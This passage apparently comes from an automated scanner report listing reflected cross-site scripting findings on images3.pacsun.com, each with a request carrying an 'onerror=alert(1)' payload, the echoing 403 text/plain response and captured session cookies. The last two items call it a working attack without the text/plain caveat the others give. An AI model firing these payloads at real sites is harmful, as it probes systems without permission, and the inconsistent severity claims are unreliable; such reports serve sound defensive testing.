Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8335697_0127c18<img src=a onerror=alert(1)>e49400a6971

3.163. http://images3.pacsun.com/is/image/pacsunproducts/8349110_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349110_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 2eb8d<img%20src%3da%20onerror%3dalert(1)>d5c30b3b792 was submitted in the REST URL parameter 4 and was echoed as 2eb8d<img src=a onerror=alert(1)>d5c30b3b792 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8349110_012eb8d<img%20src%3da%20onerror%3dalert(1)>d5c30b3b792?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8349110_012eb8d<img src=a onerror=alert(1)>d5c30b3b792

3.164. http://images3.pacsun.com/is/image/pacsunproducts/8349136_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349136_01_001

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload c44d2<img%20src%3da%20onerror%3dalert(1)>c9ec97fa83d was submitted in the REST URL parameter 4 and was echoed as c44d2<img src=a onerror=alert(1)>c9ec97fa83d in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8349136_01_001c44d2<img%20src%3da%20onerror%3dalert(1)>c9ec97fa83d?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8349136_01_001c44d2<img src=a onerror=alert(1)>c9ec97fa83d

3.165. http://images3.pacsun.com/is/image/pacsunproducts/8349136_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349136_sw_001

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload b0452<img%20src%3da%20onerror%3dalert(1)>04e3d076a29 was submitted in the REST URL parameter 4 and was echoed as b0452<img src=a onerror=alert(1)>04e3d076a29 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8349136_sw_001b0452<img%20src%3da%20onerror%3dalert(1)>04e3d076a29?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8349136_sw_001b0452<img src=a onerror=alert(1)>04e3d076a29

3.166. http://images3.pacsun.com/is/image/pacsunproducts/8349136_sw_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349136_sw_040

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload c8217<img%20src%3da%20onerror%3dalert(1)>5ad7d86071 was submitted in the REST URL parameter 4 and was echoed as c8217<img src=a onerror=alert(1)>5ad7d86071 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8349136_sw_040c8217<img%20src%3da%20onerror%3dalert(1)>5ad7d86071?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8349136_sw_040c8217<img src=a onerror=alert(1)>5ad7d86071

3.167. http://images3.pacsun.com/is/image/pacsunproducts/8357543_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8357543_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 79f41<img%20src%3da%20onerror%3dalert(1)>5ccd163b7c8 was submitted in the REST URL parameter 4 and was echoed as 79f41<img src=a onerror=alert(1)>5ccd163b7c8 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8357543_0179f41<img%20src%3da%20onerror%3dalert(1)>5ccd163b7c8?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8357543_0179f41<img src=a onerror=alert(1)>5ccd163b7c8

3.168. http://images3.pacsun.com/is/image/pacsunproducts/8359663_01_010 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8359663_01_010

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 755eb<img%20src%3da%20onerror%3dalert(1)>47067a17344 was submitted in the REST URL parameter 4 and was echoed as 755eb<img src=a onerror=alert(1)>47067a17344 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8359663_01_010755eb<img%20src%3da%20onerror%3dalert(1)>47067a17344?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8359663_01_010755eb<img src=a onerror=alert(1)>47067a17344

3.169. http://images3.pacsun.com/is/image/pacsunproducts/8365843_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8365843_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 1d143<img%20src%3da%20onerror%3dalert(1)>936e8defb60 was submitted in the REST URL parameter 4 and was echoed as 1d143<img src=a onerror=alert(1)>936e8defb60 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8365843_011d143<img%20src%3da%20onerror%3dalert(1)>936e8defb60?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8365843_011d143<img src=a onerror=alert(1)>936e8defb60

3.170. http://images3.pacsun.com/is/image/pacsunproducts/8379786_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8379786_01

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 69983<img%20src%3da%20onerror%3dalert(1)>f35ffca885f was submitted in the REST URL parameter 4 and was echoed as 69983<img src=a onerror=alert(1)>f35ffca885f in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8379786_0169983<img%20src%3da%20onerror%3dalert(1)>f35ffca885f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8379786_0169983<img src=a onerror=alert(1)>f35ffca885f

3.171. http://images3.pacsun.com/is/image/pacsunproducts/8387508_01_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8387508_01_040

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 83df9<img%20src%3da%20onerror%3dalert(1)>d9b39cf6009 was submitted in the REST URL parameter 4 and was echoed as 83df9<img src=a onerror=alert(1)>d9b39cf6009 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8387508_01_04083df9<img%20src%3da%20onerror%3dalert(1)>d9b39cf6009?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8387508_01_04083df9<img src=a onerror=alert(1)>d9b39cf6009

3.172. http://images3.pacsun.com/is/image/pacsunproducts/8387508_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8387508_sw_001

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 9d13e<img%20src%3da%20onerror%3dalert(1)>698417051a5 was submitted in the REST URL parameter 4 and was echoed as 9d13e<img src=a onerror=alert(1)>698417051a5 in the application's response.

The echoed payload uses an event handler to introduce JavaScript, so it would execute if the response were parsed as HTML. The recorded response, however, is a 403 served as Content-Type: text/plain; a browser that honours the declared type renders the markup as text, so exploitability depends on content sniffing in older browsers and should be confirmed in a browser before the High/Certain rating is accepted.

Request

GET /is/image/pacsunproducts/8387508_sw_0019d13e<img%20src%3da%20onerror%3dalert(1)>698417051a5?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8387508_sw_0019d13e<img src=a onerror=alert(1)>698417051a5

3.173. http://images3.pacsun.com/is/image/pacsunproducts/8387508_sw_040 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8387508_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 99b97<img%20src%3da%20onerror%3dalert(1)>a15cb515776 was submitted in the REST URL parameter 4. This input was echoed as 99b97<img src=a onerror=alert(1)>a15cb515776 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8387508_sw_04099b97<img%20src%3da%20onerror%3dalert(1)>a15cb515776?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8387508_sw_04099b97<img src=a onerror=alert(1)>a15cb515776

3.174. http://images3.pacsun.com/is/image/pacsunproducts/8397788_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8397788_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6863f<img%20src%3da%20onerror%3dalert(1)>762e2322661 was submitted in the REST URL parameter 4. This input was echoed as 6863f<img src=a onerror=alert(1)>762e2322661 in the application's response.

